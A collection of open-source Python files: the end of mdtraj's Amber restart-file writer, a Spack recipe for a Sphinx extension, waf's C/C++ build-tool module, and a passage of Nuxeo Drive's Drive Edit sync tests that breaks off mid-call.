        v = ncfile.createVariable('spatial', 'c', ('spatial',))
        v[:] = np.asarray(list('xyz'))
        v = ncfile.createVariable('coordinates', 'd', ('atom', 'spatial'))
        v.units = 'angstrom'
        if set_cell:
            v = ncfile.createVariable('cell_angular', 'c',
                                      ('cell_angular', 'label'))
            v[0] = np.asarray(list('alpha'))
            v[1] = np.asarray(list('beta '))
            v[2] = np.asarray(list('gamma'))
            v = ncfile.createVariable('cell_spatial', 'c', ('cell_spatial',))
            v[:] = np.asarray(list('abc'))
            v = ncfile.createVariable('cell_lengths', 'd', ('cell_spatial',))
            v.units = 'angstrom'
            v = ncfile.createVariable('cell_angles', 'd', ('cell_angular',))
            v.units = 'degree'
        if set_time:
            v = ncfile.createVariable('time', 'd', ('time',))
            v.units = 'picoseconds'
        self.flush()
    def __enter__(self):
        return self
    def __exit__(self, *exc_info):
        self.close()
    def close(self):
        if not self._closed and hasattr(self, '_handle'):
            self._handle.close()
        self._closed = True
    def __del__(self):
        self.close()
    def __len__(self):
        return 1 # All restarts have only 1 frame
    def flush(self):
        self._validate_open()
        if self._mode != 'w':
            raise IOError('Cannot flush a file opened for reading')
        self._handle.flush()
| ctk3b/mdtraj | mdtraj/formats/amberrst.py | Python | lgpl-2.1 | 33,272 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
# Spack package recipe: declarative metadata only; build logic is inherited
# from PythonPackage.
class PySphinxcontribProgramoutput(PythonPackage):
    """A Sphinx extension to literally insert the output of arbitrary commands
    into documents, helping you to keep your command examples up to date."""
    homepage = "https://sphinxcontrib-programoutput.readthedocs.org/"
    url = "https://pypi.io/packages/source/s/sphinxcontrib-programoutput/sphinxcontrib-programoutput-0.10.tar.gz"
    # FIXME: These import tests don't work for some reason
    # import_modules = ['sphinxcontrib', 'sphinxcontrib.programoutput']
    # version checksum is the md5 of the source tarball above
    version('0.10', '8e511e476c67696c7ae2c08b15644eb4')
    depends_on('py-setuptools', type='build')
    depends_on('py-sphinx@1.3.5:', type=('build', 'run'))
| wscullin/spack | var/spack/repos/builtin/packages/py-sphinxcontrib-programoutput/package.py | Python | lgpl-2.1 | 1,947 |
#! /usr/bin/env python
# encoding: utf-8
import os,sys,re
import TaskGen,Task,Utils,preproc,Logs,Build,Options
from Logs import error,debug,warn
from Utils import md5
from TaskGen import taskgen,after,before,feature
from Constants import*
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
import config_c
# Module-level flags for waf's ccroot tool (auto-generated, compressed file).
USE_TOP_LEVEL=False
# True on platforms where shared libraries use the Windows DLL naming scheme.
win_platform=sys.platform in('win32','cygwin')
def get_cc_version(conf,cc,gcc=False,icc=False):
    # Run the preprocessor with -dM to dump all predefined macros; the macro
    # values identify the compiler and its version.
    cmd=cc+['-dM','-E','-']
    try:
        p=Utils.pproc.Popen(cmd,stdin=Utils.pproc.PIPE,stdout=Utils.pproc.PIPE,stderr=Utils.pproc.PIPE)
        p.stdin.write('\n')
        out=p.communicate()[0]
    except:
        # NOTE(review): bare except is waf house style here; any failure to
        # spawn the compiler aborts configuration via conf.fatal.
        conf.fatal('could not determine the compiler version %r'%cmd)
    out=str(out)
    if gcc:
        # icc also defines __GNUC__, so reject it explicitly when the caller
        # asked specifically for gcc.
        if out.find('__INTEL_COMPILER')>=0:
            conf.fatal('The intel compiler pretends to be gcc')
        if out.find('__GNUC__')<0:
            conf.fatal('Could not determine the compiler type')
    if icc and out.find('__INTEL_COMPILER')<0:
        conf.fatal('Not icc/icpc')
    # k maps macro name -> macro value, e.g. '__GNUC__' -> '4'.
    k={}
    if icc or gcc:
        out=out.split('\n')
        import shlex
        for line in out:
            # Each line looks like: #define NAME VALUE
            lst=shlex.split(line)
            if len(lst)>2:
                key=lst[1]
                val=lst[2]
                k[key]=val
        # CC_VERSION is only set for gcc/icc; other compilers leave it unset.
        conf.env['CC_VERSION']=(k['__GNUC__'],k['__GNUC_MINOR__'],k['__GNUC_PATCHLEVEL__'])
    return k
class DEBUG_LEVELS:
	"""Namespace of the build variant names understood by the c/c++ tools."""
	ULTRADEBUG="ultradebug"
	DEBUG="debug"
	RELEASE="release"
	OPTIMIZED="optimized"
	CUSTOM="custom"
	# every known level, useful for validating user input
	ALL=[ULTRADEBUG,DEBUG,RELEASE,OPTIMIZED,CUSTOM]
def scan(self):
	"""Scan method for c/c++ tasks: run the preprocessor on every input node
	and return the resolved dependency nodes plus the unresolved names.

	:return: tuple ``(nodes, names)`` for the waf dependency tracker
	"""
	debug('ccroot: _scan_preprocessor(self, node, env, path_lst)')
	if len(self.inputs)==1:
		# fast path: a single source file needs no de-duplication
		node=self.inputs[0]
		(nodes,names)=preproc.get_deps(node,self.env,nodepaths=self.env['INC_PATHS'])
		if Logs.verbose:
			debug('deps: deps for %s: %r; unresolved %r'%(str(node),nodes,names))
		return(nodes,names)
	all_nodes=[]
	all_names=[]
	# use a set for the id() membership tests: the previous list-based
	# lookup made the de-duplication quadratic in the number of deps
	seen=set()
	for node in self.inputs:
		(nodes,names)=preproc.get_deps(node,self.env,nodepaths=self.env['INC_PATHS'])
		if Logs.verbose:
			debug('deps: deps for %s: %r; unresolved %r'%(str(node),nodes,names))
		for x in nodes:
			# de-duplicate by object identity, preserving first-seen order
			if id(x)in seen:continue
			seen.add(id(x))
			all_nodes.append(x)
		for x in names:
			if not x in all_names:
				all_names.append(x)
	return(all_nodes,all_names)
class ccroot_abstract(TaskGen.task_gen):
	"""Base class for c/c++ task generators; normalizes the feature string."""
	def __init__(self,*k,**kw):
		# the second positional argument is the feature name: prepend 'c'
		# so that e.g. 'shlib' becomes 'cshlib'
		if len(k)>1:
			k=list(k)
			if k[1][0]!='c':
				k[1]='c'+k[1]
		TaskGen.task_gen.__init__(self,*k,**kw)
def get_target_name(self):
	"""Compute the output file name of the link task by applying the platform
	pattern (e.g. ``lib%s.so``) for the program/shlib/staticlib kind, plus the
	major version suffix for windows/cygwin shared libraries."""
	tp='program'
	for x in self.features:
		if x in['cshlib','cstaticlib']:
			tp=x.lstrip('c')
	pattern=self.env[tp+'_PATTERN']
	if not pattern:pattern='%s'
	dir,name=os.path.split(self.target)
	if win_platform and getattr(self,'vnum','')and'cshlib'in self.features:
		# versioned dlls carry the major version number in their name
		name=name+'-'+self.vnum.split('.')[0]
	return os.path.join(dir,pattern%name)
def install_implib(self):
	"""Install routine for windows/cygwin dlls: install the dll itself into the
	binary dir and the import library into the library dir (symlinked on cygwin)."""
	bld=self.outputs[0].__class__.bld
	bindir=self.install_path
	if not len(self.outputs)==2:
		# a dll link task must produce exactly the dll and its import lib
		raise ValueError('fail')
	dll=self.outputs[0]
	bld.install_as(bindir+os.sep+dll.name,dll.abspath(self.env),chmod=self.chmod,env=self.env)
	implib=self.outputs[1]
	libdir='${LIBDIR}'
	if not self.env['LIBDIR']:
		libdir='${PREFIX}/lib'
	if sys.platform=='cygwin':
		# on cygwin the import lib is just a symlink to the dll
		bld.symlink_as(libdir+'/'+implib.name,bindir+os.sep+dll.name,env=self.env)
	else:
		bld.install_as(libdir+'/'+implib.name,implib.abspath(self.env),env=self.env)
def install_shlib(self):
	"""Install routine for versioned unix shared libraries: install
	``libfoo.so.x.y.z`` and create the ``libfoo.so.x`` and ``libfoo.so``
	symlinks pointing at it."""
	bld=self.outputs[0].__class__.bld
	nums=self.vnum.split('.')
	path=self.install_path
	if not path:return
	libname=self.outputs[0].name
	name3=libname+'.'+self.vnum
	name2=libname+'.'+nums[0]
	name1=libname
	filename=self.outputs[0].abspath(self.env)
	bld.install_as(os.path.join(path,name3),filename,env=self.env)
	bld.symlink_as(os.path.join(path,name2),name3)
	bld.symlink_as(os.path.join(path,name1),name3)
def default_cc(self):
	"""Attach the attributes shared by all c/c++ task generators (runs before apply_core).
	NOTE(review): the list defaults are passed through Utils.def_attrs — confirm
	they are not shared between generator instances."""
	Utils.def_attrs(self,includes='',defines='',rpaths='',uselib='',uselib_local='',add_objects='',p_flag_vars=[],p_type_vars=[],compiled_tasks=[],link_task=None)
def apply_verif(self):
	"""Sanity checks: every c/c++ task generator needs sources (or extra
	objects) and a target name."""
	if not(self.source or getattr(self,'add_objects',None)):
		raise Utils.WafError('no source files specified for %s'%self)
	if not self.target:
		raise Utils.WafError('no target for %s'%self)
def vars_target_cprogram(self):
	"""Default install location and permissions for programs."""
	self.default_install_path=self.env['BINDIR']or'${PREFIX}/bin'
	self.default_chmod=O755
def vars_target_cstaticlib(self):
	"""Default install location for static libraries."""
	self.default_install_path=self.env['LIBDIR']or'${PREFIX}/lib${LIB_EXT}'
def vars_target_cshlib(self):
	"""Default install location for shared libraries: dlls go next to the
	binaries on windows/cygwin, unix shlibs go to the library dir."""
	if win_platform:
		self.default_install_path=self.env['BINDIR']or'${PREFIX}/bin'
		self.default_chmod=O755
	else:
		self.default_install_path=self.env['LIBDIR']or'${PREFIX}/lib${LIB_EXT}'
def install_target_cstaticlib(self):
	"""Propagate the install path to the link task (all link kinds)."""
	if not self.bld.is_install:return
	self.link_task.install_path=self.install_path
def install_target_cshlib(self):
	"""For versioned unix shared libraries, use the install_shlib routine
	(symlink dance) instead of the plain install."""
	if getattr(self,'vnum','')and not win_platform:
		self.link_task.vnum=self.vnum
		self.link_task.install=install_shlib
def apply_incpaths(self):
	"""Collect the include paths from uselib variables, preproc defaults and
	the generator's own ``includes`` attribute, resolve them to nodes and
	store them in env['INC_PATHS'] for the scanner."""
	lst=[]
	# paths contributed by the uselib variables (CPPPATH_<LIB>)
	for lib in self.to_list(self.uselib):
		for path in self.env['CPPPATH_'+lib]:
			if not path in lst:
				lst.append(path)
	if preproc.go_absolute:
		for path in preproc.standard_includes:
			if not path in lst:
				lst.append(path)
	for path in self.to_list(self.includes):
		if not path in lst:
			if preproc.go_absolute or not os.path.isabs(path):
				lst.append(path)
			else:
				# absolute paths outside the project go straight to CPPPATH
				self.env.prepend_value('CPPPATH',path)
	for path in lst:
		node=None
		if os.path.isabs(path):
			if preproc.go_absolute:
				node=self.bld.root.find_dir(path)
		elif path[0]=='#':
			# '#' denotes a path relative to the project top-level
			node=self.bld.srcnode
			if len(path)>1:
				node=node.find_dir(path[1:])
		else:
			node=self.path.find_dir(path)
		if node:
			self.env.append_value('INC_PATHS',node)
	if USE_TOP_LEVEL:
		self.env.append_value('INC_PATHS',self.bld.srcnode)
def apply_type_vars(self):
	"""Copy the per-kind configuration variables (program/shlib/staticlib)
	into the build variables, e.g. shlib_CCFLAGS -> CCFLAGS."""
	for x in self.features:
		if not x in['cprogram','cstaticlib','cshlib']:
			continue
		x=x.lstrip('c')
		# kind-specific default uselib (e.g. shlib_USELIB)
		st=self.env[x+'_USELIB']
		if st:self.uselib=self.uselib+' '+st
		for var in self.p_type_vars:
			compvar='%s_%s'%(x,var)
			value=self.env[compvar]
			if value:self.env.append_value(var,value)
def apply_link(self):
	"""Create the link task for the generator, choosing the task class from
	the features (static lib / c++ / c, plus dll or versioned variants)."""
	link=getattr(self,'link',None)
	if not link:
		if'cstaticlib'in self.features:link='ar_link_static'
		elif'cxx'in self.features:link='cxx_link'
		else:link='cc_link'
	if'cshlib'in self.features:
		if win_platform:
			link='dll_'+link
		elif getattr(self,'vnum',''):
			if sys.platform=='darwin':
				# soname-style versioning is not used on os x
				self.vnum=''
			else:
				link='vnum_'+link
	tsk=self.create_task(link)
	# the link inputs are the objects produced by the compile tasks
	outputs=[t.outputs[0]for t in self.compiled_tasks]
	tsk.set_inputs(outputs)
	tsk.set_outputs(self.path.find_or_declare(get_target_name(self)))
	tsk.chmod=self.chmod
	self.link_task=tsk
def apply_lib_vars(self):
	"""Process uselib_local (libraries built in this project) and uselib
	(external libraries): set link order, LIB/STATICLIB/LIBPATH values and
	propagate exported include dirs, then flatten all uselib flag variables."""
	env=self.env
	uselib=self.to_list(self.uselib)
	seen=[]
	# breadth-first walk over the local library dependencies
	names=self.to_list(self.uselib_local)[:]
	while names:
		x=names.pop(0)
		if x in seen:
			continue
		y=self.name_to_obj(x)
		if not y:
			raise Utils.WafError("object '%s' was not found in uselib_local (required by '%s')"%(x,self.name))
		# enqueue transitive local dependencies
		if getattr(y,'uselib_local',None):
			lst=y.to_list(y.uselib_local)
			for u in lst:
				if not u in seen:
					names.append(u)
		# make sure the dependency has created its tasks
		y.post()
		seen.append(x)
		libname=y.target[y.target.rfind(os.sep)+1:]
		if'cshlib'in y.features or'cprogram'in y.features:
			env.append_value('LIB',libname)
		elif'cstaticlib'in y.features:
			env.append_value('STATICLIB',libname)
		if y.link_task is not None:
			# relink when the dependency is rebuilt
			self.link_task.set_run_after(y.link_task)
			dep_nodes=getattr(self.link_task,'dep_nodes',[])
			self.link_task.dep_nodes=dep_nodes+y.link_task.outputs
			tmp_path=y.link_task.outputs[0].parent.bldpath(self.env)
			if not tmp_path in env['LIBPATH']:env.prepend_value('LIBPATH',tmp_path)
		# inherit the external uselib of the dependency
		morelibs=y.to_list(y.uselib)
		for v in morelibs:
			if v in uselib:continue
			uselib=[v]+uselib
		if getattr(y,'export_incdirs',None):
			cpppath_st=self.env['CPPPATH_ST']
			for x in self.to_list(y.export_incdirs):
				node=y.path.find_dir(x)
				if not node:
					raise Utils.WafError('object %s: invalid folder %s in export_incdirs'%(y.target,x))
				self.env.append_unique('INC_PATHS',node)
	# flatten LIB_x, CCFLAGS_x, ... into the plain variables
	for x in uselib:
		for v in self.p_flag_vars:
			val=self.env[v+'_'+x]
			if val:self.env.append_value(v,val)
def apply_objdeps(self):
	"""Add the objects produced by the generators listed in ``add_objects``
	(including their transitive add_objects) as inputs of the link task,
	preserving a depth-first order."""
	if not getattr(self,'add_objects',None):return
	seen=[]
	names=self.to_list(self.add_objects)
	while names:
		x=names[0]
		if x in seen:
			names=names[1:]
			continue
		y=self.name_to_obj(x)
		if not y:
			raise Utils.WafError("object '%s' was not found in uselib_local (required by add_objects '%s')"%(x,self.name))
		# process the dependencies of y before y itself
		if getattr(y,'add_objects',None):
			added=0
			lst=y.to_list(y.add_objects)
			lst.reverse()
			for u in lst:
				if u in seen:continue
				added=1
				names=[u]+names
			if added:continue
		y.post()
		seen.append(x)
		for t in y.compiled_tasks:
			self.link_task.inputs.extend(t.outputs)
def apply_obj_vars(self):
	"""Translate the abstract link variables (LIB, STATICLIB, LIBPATH, RPATH)
	into concrete LINKFLAGS using the platform format strings (LIB_ST, ...)."""
	v=self.env
	lib_st=v['LIB_ST']
	staticlib_st=v['STATICLIB_ST']
	libpath_st=v['LIBPATH_ST']
	staticlibpath_st=v['STATICLIBPATH_ST']
	rpath_st=v['RPATH_ST']
	app=v.append_unique
	if v['FULLSTATIC']:
		v.append_value('LINKFLAGS',v['FULLSTATIC_MARKER'])
	for i in v['RPATH']:
		if i and rpath_st:
			app('LINKFLAGS',rpath_st%i)
	for i in v['LIBPATH']:
		# each search path is added for both shared and static lookup
		app('LINKFLAGS',libpath_st%i)
		app('LINKFLAGS',staticlibpath_st%i)
	if v['STATICLIB']:
		v.append_value('LINKFLAGS',v['STATICLIB_MARKER'])
		k=[(staticlib_st%i)for i in v['STATICLIB']]
		app('LINKFLAGS',k)
	if not v['FULLSTATIC']:
		if v['STATICLIB']or v['LIB']:
			v.append_value('LINKFLAGS',v['SHLIB_MARKER'])
	app('LINKFLAGS',[lib_st%i for i in v['LIB']])
def apply_vnum(self):
	"""On platforms with soname-style versioning, declare the versioned
	library name as an extra link output and pass the soname flag."""
	if sys.platform not in('win32','cygwin','darwin'):
		try:
			nums=self.vnum.split('.')
		except AttributeError:
			# no vnum attribute: nothing to do
			pass
		else:
			try:name3=self.soname
			except AttributeError:name3=self.link_task.outputs[0].name+'.'+nums[0]
			self.link_task.outputs.append(self.link_task.outputs[0].parent.find_or_declare(name3))
			self.env.append_value('LINKFLAGS',(self.env['SONAME_ST']%name3).split())
def apply_implib(self):
	"""On windows/cygwin, declare the import library as a second link output
	and install both via install_implib."""
	if win_platform:
		dll=self.link_task.outputs[0]
		implib=dll.parent.find_or_declare(self.env['implib_PATTERN']%os.path.split(self.target)[1])
		self.link_task.outputs.append(implib)
		if sys.platform=='cygwin':
			# gcc on cygwin produces the import lib automatically
			pass
		elif sys.platform=='win32':
			self.env.append_value('LINKFLAGS',(self.env['IMPLIB_ST']%implib.bldpath(self.env)).split())
		self.link_task.install=install_implib
def process_obj_files(self):
	"""Add the object files queued by add_obj_file() as inputs of the link task."""
	if not hasattr(self,'obj_files'):return
	for x in self.obj_files:
		node=self.path.find_resource(x)
		self.link_task.inputs.append(node)
def add_obj_file(self,file):
	"""Queue an extra object file to be linked into this task generator.

	Registers the 'process_obj_files' method (once) so the queued files are
	later added as inputs of the link task.
	"""
	if not hasattr(self,'obj_files'):
		self.obj_files=[]
	if 'process_obj_files' not in self.meths:
		self.meths.append('process_obj_files')
	self.obj_files.append(file)
c_attrs={'cxxflag':'CXXFLAGS','cflag':'CCFLAGS','ccflag':'CCFLAGS','linkflag':'LINKFLAGS','ldflag':'LINKFLAGS','lib':'LIB','libpath':'LIBPATH','staticlib':'STATICLIB','staticlibpath':'STATICLIBPATH','rpath':'RPATH','framework':'FRAMEWORK','frameworkpath':'FRAMEWORKPATH'}
def add_extra_flags(self):
	"""Map generator attributes such as 'cflags' or 'libpath' (singular or
	plural spelling) onto the matching env variables via the c_attrs table."""
	for x in self.__dict__.keys():
		y=x.lower()
		if y[-1]=='s':
			# accept plural spellings: 'cxxflags' -> 'cxxflag'
			y=y[:-1]
		if c_attrs.get(y,None):
			self.env.append_unique(c_attrs[y],getattr(self,x))
def link_vnum(self):
	"""Run method for versioned link tasks: link the real (versioned) library
	using the base class run(), then create the unversioned symlink."""
	clsname=self.__class__.__name__.replace('vnum_','')
	out=self.outputs
	# temporarily hide the symlink output so the base run() links only the lib
	self.outputs=out[1:]
	ret=Task.TaskBase.classes[clsname].__dict__['run'](self)
	self.outputs=out
	if ret:
		return ret
	try:
		os.remove(self.outputs[0].abspath(self.env))
	except OSError:
		pass
	try:
		os.symlink(self.outputs[1].name,self.outputs[0].bldpath(self.env))
	except:
		# NOTE(review): bare except; any symlink failure marks the task failed
		return 1
def post_dll_link(self):
	"""After linking a dll on cygwin, replace the import library output with a
	symlink pointing at the dll itself."""
	if sys.platform=='cygwin':
		try:
			os.remove(self.outputs[1].abspath(self.env))
		except OSError:
			pass
		try:
			os.symlink(self.outputs[0].name,self.outputs[1].bldpath(self.env))
		except:
			# NOTE(review): bare except; any symlink failure marks the task failed
			return 1
# Wire the functions above into the task generator engine: feature(...)
# registers a function as a method for generators with the given features,
# while before()/after() constrain its execution order relative to other
# methods, and taskgen() attaches a plain method to all task generators.
feature('cc','cxx')(default_cc)
before('apply_core')(default_cc)
feature('cprogram','dprogram','cstaticlib','dstaticlib','cshlib','dshlib')(apply_verif)
feature('cprogram','dprogram')(vars_target_cprogram)
before('apply_core')(vars_target_cprogram)
feature('cstaticlib','dstaticlib')(vars_target_cstaticlib)
before('apply_core')(vars_target_cstaticlib)
feature('cshlib','dshlib')(vars_target_cshlib)
before('apply_core')(vars_target_cshlib)
feature('cprogram','dprogram','cstaticlib','dstaticlib','cshlib','dshlib')(install_target_cstaticlib)
after('apply_objdeps','apply_link')(install_target_cstaticlib)
feature('cshlib','dshlib')(install_target_cshlib)
after('apply_link')(install_target_cshlib)
feature('cc','cxx')(apply_incpaths)
after('apply_type_vars','apply_lib_vars','apply_core')(apply_incpaths)
feature('cc','cxx')(apply_type_vars)
after('init_cc','init_cxx')(apply_type_vars)
before('apply_lib_vars')(apply_type_vars)
feature('cprogram','cshlib','cstaticlib')(apply_link)
after('apply_core')(apply_link)
feature('cc','cxx')(apply_lib_vars)
after('apply_link','init_cc','init_cxx')(apply_lib_vars)
feature('cprogram','cstaticlib','cshlib')(apply_objdeps)
after('apply_obj_vars','apply_vnum','apply_implib','apply_link')(apply_objdeps)
feature('cprogram','cshlib','cstaticlib')(apply_obj_vars)
after('apply_lib_vars')(apply_obj_vars)
feature('cshlib')(apply_vnum)
after('apply_link')(apply_vnum)
before('apply_lib_vars')(apply_vnum)
feature('implib')(apply_implib)
after('apply_link')(apply_implib)
before('apply_lib_vars')(apply_implib)
after('apply_link')(process_obj_files)
taskgen(add_obj_file)
feature('cc','cxx')(add_extra_flags)
before('init_cxx','init_cc')(add_extra_flags)
before('apply_lib_vars','apply_obj_vars','apply_incpaths','init_cc')(add_extra_flags)
| micove/libdesktop-agnostic | wafadmin/Tools/ccroot.py | Python | lgpl-2.1 | 13,478 |
import os
import time
from nose.plugins.skip import SkipTest
from nxdrive.client import LocalClient
from nxdrive.tests.common import OS_STAT_MTIME_RESOLUTION
from nxdrive.client.common import LOCALLY_EDITED_FOLDER_NAME
from nxdrive.tests.common_unit_test import UnitTestCase
DRIVE_EDIT_XATTR_NAMES = ['ndrive', 'nxdriveedit', 'nxdriveeditdigest', 'nxdriveeditname']
class TestDriveEdit(UnitTestCase):
    """End-to-end tests for the Drive Edit feature: editing a server document
    through a locally downloaded copy that is synchronized back to the server."""

    # Server-side path of the 'Locally Edited' collection for the test user.
    locally_edited_path = ('/default-domain/UserWorkspaces/'
                           + 'nuxeoDriveTestUser-user-1/Collections/'
                           + LOCALLY_EDITED_FOLDER_NAME)

    def setUpApp(self):
        # Start the drive edit engine and plug its completion signal into the
        # test application so wait_sync() can detect upload completion.
        super(TestDriveEdit, self).setUpApp()
        self.drive_edit = self.manager_1.get_drive_edit()
        self.drive_edit.driveEditUploadCompleted.connect(self.app.sync_completed)
        self.drive_edit.start()
        self.remote = self.remote_document_client_1
        self.local = LocalClient(os.path.join(self.nxdrive_conf_folder_1, 'edit'))

    def tearDownApp(self):
        self.drive_edit.stop()
        super(TestDriveEdit, self).tearDownApp()

    def test_filename_encoding(self):
        """Drive edit must resolve the same document whatever file name
        encoding the browser uses in the edit URL."""
        filename = u'Mode op\xe9ratoire.txt'
        doc_id = self.remote.make_file('/', filename, 'Some content.')
        # Linux / Win + Chrome: quoted utf-8 encoded
        browser_filename = 'Mode%20op%C3%A9ratoire.txt'
        self._drive_edit_update(doc_id, filename, browser_filename, 'Win + Chrome')
        # Win + IE: unquoted utf-8 encoded
        browser_filename = 'Mode op\xc3\xa9ratoire.txt'
        self._drive_edit_update(doc_id, filename, browser_filename, 'Win + IE')
        # Win + FF: quoted string containing unicode
        browser_filename = 'Mode%20op\xe9ratoire.txt'
        self._drive_edit_update(doc_id, filename, browser_filename, 'Win + FF')
        # OSX + Chrome / OSX + FF: quoted utf-8 encoded, except for white spaces!
        browser_filename = 'Mode op%C3%A9ratoire.txt'
        self._drive_edit_update(doc_id, filename, browser_filename, 'OS X + Chrome or FF')

    def _drive_edit_update(self, doc_id, filename, browser_filename, content):
        """Download *doc_id* under *browser_filename*, overwrite the local copy
        with *content* and check that the new content reaches the server."""
        # Download file
        local_path = '/%s/%s' % (doc_id, filename)
        self.drive_edit._prepare_edit(self.nuxeo_url, doc_id, browser_filename)
        self.assertTrue(self.local.exists(local_path))
        self.wait_sync(timeout=2, fail_if_timeout=False)
        # Update file content
        self.local.update_content(local_path, content)
        self.wait_sync()
        self.assertEquals(self.remote.get_content('/' + filename), content)

    def test_drive_edit_non_synced_doc(self):
        # The body below is unreachable until the SkipTest is removed.
        raise SkipTest("WIP in https://jira.nuxeo.com/browse/NXDRIVE-170")
        ctl = self.controller_1
        ctl.bind_server(self.local_nxdrive_folder_1, self.nuxeo_url,
                        self.user_1, self.password_1)
        local = LocalClient(self.local_nxdrive_folder_1)
        remote = self.remote_document_client_1
        syn = ctl.synchronizer
        # Create file in test workspace (non sync root)
        doc_id = remote.make_file('/', 'test.odt', 'Some content.')
        # Drive edit file
        ctl.download_edit(self.nuxeo_url, 'default', doc_id, 'test.odt',
                          open_file=False)
        # Check file is downloaded to the Locally Edited folder
        self.assertTrue(local.exists('/%s/test.odt'
                                     % LOCALLY_EDITED_FOLDER_NAME))
        self.assertEquals(local.get_content('/%s/test.odt'
                                            % LOCALLY_EDITED_FOLDER_NAME),
                          'Some content.')
        # Check Locally Edited collection exists, is registered as a sync root
        # for test user and file is member of it
        self.assertTrue(self.root_remote_client.exists(
            self.locally_edited_path))
        sync_roots = remote.get_roots()
        self.assertEquals(len(sync_roots), 1)
        self.assertEquals(sync_roots[0].path, self.locally_edited_path)
        self.assertTrue(doc_id in
                        self.root_remote_client.get_collection_members(
                            self.locally_edited_path))
        # Update locally edited file
        # Let's first sync because of https://jira.nuxeo.com/browse/NXDRIVE-144
        self._sync(syn)
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.update_content('/%s/test.odt' % LOCALLY_EDITED_FOLDER_NAME,
                             'Updated content.')
        self._sync(syn, wait_for_async=False)
        self.assertEquals(remote.get_content('/test.odt'), 'Updated content.')
        # Drive edit file a second time (should not download a new file but
        # detect the existing one)
        ctl.download_edit(self.nuxeo_url, 'default', doc_id, 'test.odt',
                          open_file=False)
        self.assertEquals(len(local.get_children_info('/%s'
                                                      % LOCALLY_EDITED_FOLDER_NAME)), 1)
        # Update locally edited file
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.update_content('/%s/test.odt' % LOCALLY_EDITED_FOLDER_NAME,
                             'Twice updated content.')
        self._sync(syn, wait_for_async=False)
        self.assertEquals(remote.get_content('/test.odt'),
                          'Twice updated content.')

    def test_drive_edit_synced_doc(self):
        # The body below is unreachable until the SkipTest is removed.
        raise SkipTest("WIP in https://jira.nuxeo.com/browse/NXDRIVE-170")
        ctl = self.controller_1
        ctl.bind_server(self.local_nxdrive_folder_1, self.nuxeo_url,
                        self.user_1, self.password_1)
        ctl.bind_root(self.local_nxdrive_folder_1, self.workspace)
        local = LocalClient(self.local_nxdrive_folder_1)
        remote = self.remote_document_client_1
        syn = ctl.synchronizer
        # Create file in test workspace (sync root)
        doc_id = remote.make_file('/', 'test.odt', 'Some content.')
        # Launch first synchronization
        self._sync(syn)
        self.assertTrue(local.exists('/%s/test.odt' % self.workspace_title))
        # Drive edit file
        ctl.download_edit(self.nuxeo_url, 'default', doc_id, 'test.odt',
                          open_file=False)
        # Check file is downloaded to the Locally Edited folder
        self.assertTrue(local.exists('/%s/test.odt'
                                     % LOCALLY_EDITED_FOLDER_NAME))
        self.assertEquals(local.get_content('/%s/test.odt'
                                            % LOCALLY_EDITED_FOLDER_NAME),
                          'Some content.')
        # Update locally edited file
        # Let's first sync because of https://jira.nuxeo.com/browse/NXDRIVE-144
        self._sync(syn)
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.update_content('/%s/test.odt' % LOCALLY_EDITED_FOLDER_NAME,
                             'Content updated from Locally Edited.')
        self._sync(syn, wait_for_async=False)
        self.assertEquals(remote.get_content('/test.odt'),
                          'Content updated from Locally Edited.')
        self._sync(syn)
        self.assertEquals(local.get_content('/%s/test.odt'
                                            % self.workspace_title),
                          'Content updated from Locally Edited.')
        # Update file in local sync root
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.update_content('/%s/test.odt' % self.workspace_title,
                             'Content updated from local sync root.')
        self._sync(syn, wait_for_async=False)
        self.assertEquals(remote.get_content('/test.odt'),
                          'Content updated from local sync root.')
        self._sync(syn)
        self.assertEquals(local.get_content('/%s/test.odt'
                                            % LOCALLY_EDITED_FOLDER_NAME),
                          'Content updated from local sync root.')
        # Update file in remote sync root
        remote.update_content('/test.odt',
                              'Content updated from remote sync root.')
        self._sync(syn)
        self.assertEquals(local.get_content('/%s/test.odt'
                                            % self.workspace_title),
                          'Content updated from remote sync root.')
        self.assertEquals(local.get_content('/%s/test.odt'
                                            % LOCALLY_EDITED_FOLDER_NAME),
                          'Content updated from remote sync root.')

    def test_drive_edit_doc_becoming_synced(self):
        # The body below is unreachable until the SkipTest is removed.
        raise SkipTest("WIP in https://jira.nuxeo.com/browse/NXDRIVE-170")
        ctl = self.controller_1
        ctl.bind_server(self.local_nxdrive_folder_1, self.nuxeo_url,
                        self.user_1, self.password_1)
        local = LocalClient(self.local_nxdrive_folder_1)
        remote = self.remote_document_client_1
        syn = ctl.synchronizer
        # Create file in test workspace (non sync root)
        doc_id = remote.make_file('/', 'test.odt', 'Some content.')
        # Drive edit file
        ctl.download_edit(self.nuxeo_url, 'default', doc_id, 'test.odt',
                          open_file=False)
        # Check file is downloaded to the Locally Edited folder
        self.assertTrue(local.exists('/%s/test.odt'
                                     % LOCALLY_EDITED_FOLDER_NAME))
        # Register test workspace as a sync root
        ctl.bind_root(self.local_nxdrive_folder_1, self.workspace)
        self._sync(syn)
        self.assertTrue(local.exists('/%s/test.odt' % self.workspace_title))
        # Update file in local sync root
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.update_content('/%s/test.odt' % self.workspace_title,
                             'Content updated from local sync root.')
        self._sync(syn, wait_for_async=False)
        self.assertEquals(remote.get_content('/test.odt'),
                          'Content updated from local sync root.')
        self._sync(syn)
        self.assertEquals(local.get_content('/%s/test.odt'
                                            % LOCALLY_EDITED_FOLDER_NAME),
